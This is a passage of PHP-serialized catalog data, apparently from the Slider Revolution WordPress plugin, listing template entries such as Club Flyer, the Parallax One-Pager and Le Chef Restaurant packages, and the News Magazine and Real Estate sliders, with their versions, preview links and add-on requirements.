AddOn\";s:5:\"alias\";s:15:\"distortionaddon\";s:3:\"zip\";s:19:\"distortionaddon.zip\";s:3:\"uid\";s:32:\"0ad46c9929bb2fa6316f1e6ced301aaf\";s:3:\"img\";s:26:\"distortionaddon/slide1.jpg\";s:7:\"preview\";s:73:\"https://revolution.themepunch.com/distortion-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Distortion Add-On allows you to create interesting Distortion style effects on any of your Slider Revolution content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:182:\"[{\"path\":\"revslider-liquideffect-addon\\/revslider-liquideffect-addon.php\",\"name\":\"Distortion Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:234;a:22:{s:2:\"id\";s:3:\"243\";s:5:\"title\";s:10:\"Club Flyer\";s:5:\"alias\";s:9:\"clubflyer\";s:3:\"zip\";s:13:\"clubflyer.zip\";s:3:\"uid\";s:32:\"dab73b9904d0e643a35b0475980998bd\";s:3:\"img\";s:20:\"clubflyer/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/club-flyer-landing-page-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:227:\"<span class=\"ttm_content\">This Club Fyler Template for Slider Revolution uses the brand new Exploding Layers Add-On to create a captivating effect. Tap into unlimited creative potential. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:187:\"[{\"path\":\"revslider-explodinglayers-addon\\/revslider-explodinglayers-addon.php\",\"name\":\"Exploding Layers AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:235;a:22:{s:2:\"id\";s:3:\"244\";s:5:\"title\";s:16:\"Paintbrush AddOn\";s:5:\"alias\";s:15:\"paintbrushaddon\";s:3:\"zip\";s:19:\"paintbrushaddon.zip\";s:3:\"uid\";s:32:\"c85c48a6742b4bf72a2590cc1b50f6a0\";s:3:\"img\";s:26:\"paintbrushaddon/slide1.jpg\";s:7:\"preview\";s:73:\"https://revolution.themepunch.com/paintbrush-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">The Paintbrush Add-On for WordPress allows you to add cool mouse interaction effects to your Slider Revolution content. Examples: Blur Reveal, Color Reveal, Scratch Me Free.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-paintbrush-addon\\/revslider-paintbrush-addon.php\",\"name\":\"Paintbrush AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:236;a:25:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:18:\"Parallax One-Pager\";s:5:\"alias\";s:26:\"parallax-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"parallax-one-pager-package\";s:3:\"img\";s:39:\"packages/parallax-one-pager-package.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:237;a:25:{s:2:\"id\";s:3:\"246\";s:5:\"title\";s:15:\"Parallax Header\";s:5:\"alias\";s:15:\"parallax_header\";s:3:\"zip\";s:25:\"packs/parallax_header.zip\";s:3:\"uid\";s:32:\"32bf4a0f5136853bd6bd366275a7a60b\";s:3:\"img\";s:26:\"parallax_header/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:238;a:25:{s:2:\"id\";s:3:\"247\";s:5:\"title\";s:16:\"Parallax Content\";s:5:\"alias\";s:16:\"parallax_content\";s:3:\"zip\";s:26:\"packs/parallax_content.zip\";s:3:\"uid\";s:32:\"a25c5fb8f74757476ab4dc038e56f90d\";s:3:\"img\";s:27:\"parallax_content/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:239;a:25:{s:2:\"id\";s:3:\"248\";s:5:\"title\";s:15:\"Parallax Footer\";s:5:\"alias\";s:15:\"parallax_footer\";s:3:\"zip\";s:25:\"packs/parallax_footer.zip\";s:3:\"uid\";s:32:\"665dff9ea6eaf162a2a1f160f51a9ddb\";s:3:\"img\";s:26:\"parallax_footer/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:240;a:25:{s:2:\"id\";s:3:\"249\";s:5:\"title\";s:18:\"Le Chef Restaurant\";s:5:\"alias\";s:18:\"le-chef-restaurant\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"le-chef-restaurant-package\";s:3:\"img\";s:39:\"packages/le-chef-restaurant-package.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:241;a:25:{s:2:\"id\";s:3:\"250\";s:5:\"title\";s:12:\"Le Chef Menu\";s:5:\"alias\";s:12:\"le-chef-menu\";s:3:\"zip\";s:22:\"packs/le-chef-menu.zip\";s:3:\"uid\";s:32:\"2f2a6a333431fefe4a7b3b6a982b2ff5\";s:3:\"img\";s:23:\"le-chef-menu/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:242;a:25:{s:2:\"id\";s:3:\"251\";s:5:\"title\";s:14:\"Le Chef Header\";s:5:\"alias\";s:14:\"le-chef-header\";s:3:\"zip\";s:24:\"packs/le-chef-header.zip\";s:3:\"uid\";s:32:\"06450ca3be5a4a8959f3752ab974e574\";s:3:\"img\";s:25:\"le-chef-header/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:243;a:25:{s:2:\"id\";s:3:\"252\";s:5:\"title\";s:18:\"Le Chef Philosophy\";s:5:\"alias\";s:18:\"le-chef-philosophy\";s:3:\"zip\";s:28:\"packs/le-chef-philosophy.zip\";s:3:\"uid\";s:32:\"a532fd029addeb18106e751409b8e20a\";s:3:\"img\";s:29:\"le-chef-philosophy/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:244;a:25:{s:2:\"id\";s:3:\"253\";s:5:\"title\";s:12:\"Le Chef Food\";s:5:\"alias\";s:12:\"le-chef-food\";s:3:\"zip\";s:22:\"packs/le-chef-food.zip\";s:3:\"uid\";s:32:\"cd4b6a2cb5de2dd20a0e8ba0c35451df\";s:3:\"img\";s:23:\"le-chef-food/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:245;a:25:{s:2:\"id\";s:3:\"254\";s:5:\"title\";s:16:\"Le Chef La Carte\";s:5:\"alias\";s:16:\"le-chef-la-carte\";s:3:\"zip\";s:26:\"packs/le-chef-la-carte.zip\";s:3:\"uid\";s:32:\"6f312749679c3ba52c41189a6b8bf729\";s:3:\"img\";s:27:\"le-chef-la-carte/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:246;a:25:{s:2:\"id\";s:3:\"255\";s:5:\"title\";s:14:\"Le Chef Footer\";s:5:\"alias\";s:14:\"le-chef-footer\";s:3:\"zip\";s:24:\"packs/le-chef-footer.zip\";s:3:\"uid\";s:32:\"12fc241e8e5b9e5df9758c43448e2907\";s:3:\"img\";s:25:\"le-chef-footer/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:247;a:22:{s:2:\"id\";s:3:\"256\";s:5:\"title\";s:20:\"News Magazine Slider\";s:5:\"alias\";s:20:\"news-magazine-slider\";s:3:\"zip\";s:24:\"news-magazine-slider.zip\";s:3:\"uid\";s:32:\"31f2c1506babb1fef459401f051d2d52\";s:3:\"img\";s:31:\"news-magazine-slider/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/news-magazine-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:205:\"<span class=\"ttm_content\">The Magazine Slider offers various layouts that support static content images, HTML5 and Youtube video. Great for any blog or news website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:248;a:22:{s:2:\"id\";s:3:\"257\";s:5:\"title\";s:18:\"Real Estate Slider\";s:5:\"alias\";s:18:\"real-estate-slider\";s:3:\"zip\";s:22:\"real-estate-slider.zip\";s:3:\"uid\";s:32:\"739ce6336e46815094387c9448e6c804\";s:3:\"img\";s:29:\"real-estate-slider/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/real-estate-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">The Real Estate Slider allows to display real estate offers with a large ken burns background image and additional thumbnail hover images.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:249;a:22:{s:2:\"id\";s:3:\"258\";s:5:\"title\";s:14:\"Fashion Header\";s:5:\"alias\";s:14:\"fashion-header\";s:3:\"zip\";s:18:\"fashion-header.zip\";s:3:\"uid\";s:32:\"24ece4e7f4d31cd90377c62abbd9e25a\";s:3:\"img\";s:25:\"fashion-header/slide1.jpg\";s:7:\"preview\";s:75:\"https://revolution.themepunch.com/fashion-shop-header-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:254:\"<span class=\"ttm_content\">The Fashion Shop Header ist the ideal Slider to display as an intro to your shop website or as a separator in between content. Our unique \"Bubble Morph\" effect makes this module stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:250;a:22:{s:2:\"id\";s:3:\"259\";s:5:\"title\";s:14:\"Seasonal Offer\";s:5:\"alias\";s:13:\"seasonaloffer\";s:3:\"zip\";s:17:\"seasonaloffer.zip\";s:3:\"uid\";s:32:\"caf2f17f8fd64f2f89dcb3c8dd238457\";s:3:\"img\";s:24:\"seasonaloffer/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/seasonal-offer-christmas-header-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.8.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">Use the Seasonal Offer Header to promote special offers in the holiday season, or just to add some snowy christmas spirit to your website!</span>\r\n<span 